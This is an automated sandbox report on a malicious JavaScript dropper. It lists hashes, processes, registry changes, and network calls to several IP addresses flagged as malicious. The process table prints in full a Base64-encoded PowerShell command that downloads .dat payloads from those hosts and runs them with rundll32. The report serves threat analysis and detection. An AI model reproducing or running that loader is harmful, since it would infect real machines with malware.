File name: | detailsG[zPA6].js |
Full analysis: | https://app.any.run/tasks/3963384e-1865-4d05-aa0c-85a6238cb776 |
Verdict: | Malicious activity |
Analysis date: | March 31, 2023, 22:37:19 |
OS: | Windows 10 Professional (build: 19044, 64 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 3D21C75B29BAD8737C815E7362D250F9 |
SHA1: | 8F75881B5308322E4F5E40213AED19D75929A55E |
SHA256: | F319D38F0F5F26FE99B777B4E3E514B52FD98282A996EAB6DAA8B3BA56C39123 |
SSDEEP: | 3072:FwNFokQZ1Jf5ZD6qlBiu56tps1C8rBh/z9UtUhsnUUSNMy/cCUPIzHmEyRf77b+R:FwNFokQZ1Jf5ZD6qlBiu52ps1C8rBh/j |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1648 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\detailsG[zPA6].js" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
4088 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQASAB5AG0AbgBvAGwAbwBnAGkAYwBhAGwAbAB5ACAAPQAgACgAIgBoAHQAdABwADoALwAvADIAMQA2AC4AMQA0ADYALgAyADUALgAxADIAOQAvAGMAMABaAEsAdwBSADMAYQBaAFoALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AMQA5ADkALgAyADQANwAuADMAMAAuADIAMAAzAC8ANQAwAGoAeABHADkAcQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADAANAAuADIAMgA1AC4AMQAyADkALgAxADEANAAvAFIAOAA1AFMAWQBFADEAVgB5AFQALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AOAA1AC4AMgAzADkALgA0ADEALgAyADAANQAvADgATgB2AFEAZQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA5ADQALgAxADMAMQAuADEAMQA3AC4AMQAxADEALwBmAHgATwB3AHUAYQBsAHAARAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADQAMQAuADkANAAuADgANgAuADkAMAAvAGEAMABtAE0AMABuAGcAawBkAC4AZABhAHQAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAbQBpAHMAbwBjAGMAdQBwAGkAZQBkACAAaQBuACAAJABIAHkAbQBuAG8AbABvAGcAaQBjAGEAbABsAHkAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAG0AaQBzAG8AYwBjAHUAcABpAGUAZAAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwATgBvAG4AYwBoAHIAbwBtAGEAdABpAGMAYQBsAGwAeQBBAHAAbwBtAGUAdABhAGIAbwBsAG8AdQBzAC4AYQBuAGkAcwBvAHMAdABvAG0AbwB1AHMARABvAHUAdABlAHIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABOAG8AbgBjAGgAcgBvAG0AYQB0AGkAYwBhAGwAbAB5AEEAcABvAG0AZQB0AGEAYgBvAGwAbwB1AHMALgBhAG4AaQBzAG8AcwB0AG8AbQBvAHUAcwBEAG8AdQB0AGUAcgApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABOAG8AbgBjAGgAcgBvAG0AYQB0AGkAYwBhAGwAbAB5AEEAcABvAG0AZQB0AGEAYgBvAGwAbwB1AHMALgBhAG4AaQBzAG8AcwB0AG8AbQBvAHUAcwBEAG8AdQB0AGUAcgAsAFgANQA1ADUAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA==" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5624 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1620 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
(PID) Process: | (1648) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (1648) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (1648) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (1648) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (4088) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (4088) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (4088) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (4088) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
4088 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4gygwoaf.4eb.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
4088 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_arvcfk0h.ver.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
4088 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | text | |
MD5:1ACADA3C580D8D7AB5D8C84B136C78F1 | SHA256:1D4C4668DC6191C5C0B132D76740E086EC867304A736C82CA26AC5B026295207 | |||
4088 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:8871A837C29C87B2A2523695F4D7B94C | SHA256:11C212FDF804BB37790C90C61CE8181D89CDF26044389A6EFA3355DAC541E152 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4088 | powershell.exe | GET | 404 | 216.146.25.129:80 | http://216.146.25.129/c0ZKwR3aZZ.dat | US | xml | 341 b | malicious |
4088 | powershell.exe | GET | 404 | 85.239.41.205:80 | http://85.239.41.205/8NvQe.dat | CY | xml | 341 b | malicious |
4088 | powershell.exe | GET | 404 | 104.225.129.114:80 | http://104.225.129.114/R85SYE1VyT.dat | US | xml | 341 b | malicious |
3652 | slui.exe | POST | 404 | 52.161.91.37:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | US | xml | 341 b | whitelisted |
4088 | powershell.exe | GET | 404 | 199.247.30.203:80 | http://199.247.30.203/50jxG9q.dat | NL | xml | 341 b | malicious |
4088 | powershell.exe | GET | 404 | 141.94.86.90:80 | http://141.94.86.90/a0mM0ngkd.dat | FR | xml | 341 b | malicious |
4088 | powershell.exe | GET | 404 | 94.131.117.111:80 | http://94.131.117.111/fxOwualpD.dat | US | xml | 341 b | malicious |
1620 | slui.exe | POST | 404 | 52.161.91.37:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | US | xml | 341 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4088 | powershell.exe | 104.225.129.114:80 | — | SHOCK-1 | US | malicious |
4088 | powershell.exe | 199.247.30.203:80 | — | AS-CHOOPA | NL | malicious |
5432 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4088 | powershell.exe | 216.146.25.129:80 | — | CLOUDIE-NETWORKS-LLC | US | malicious |
5064 | svchost.exe | 51.104.136.2:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5952 | MoUsoCoreWorker.exe | 51.104.136.2:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 51.104.136.2:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4088 | powershell.exe | 94.131.117.111:80 | — | ZAYO-6461 | US | malicious |
4088 | powershell.exe | 141.94.86.90:80 | — | OVH SAS | FR | malicious |
4088 | powershell.exe | 85.239.41.205:80 | — | Cloudlayer8 Limited | CY | malicious |
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
4088 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
4088 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
4088 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
4088 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
4088 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
4088 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |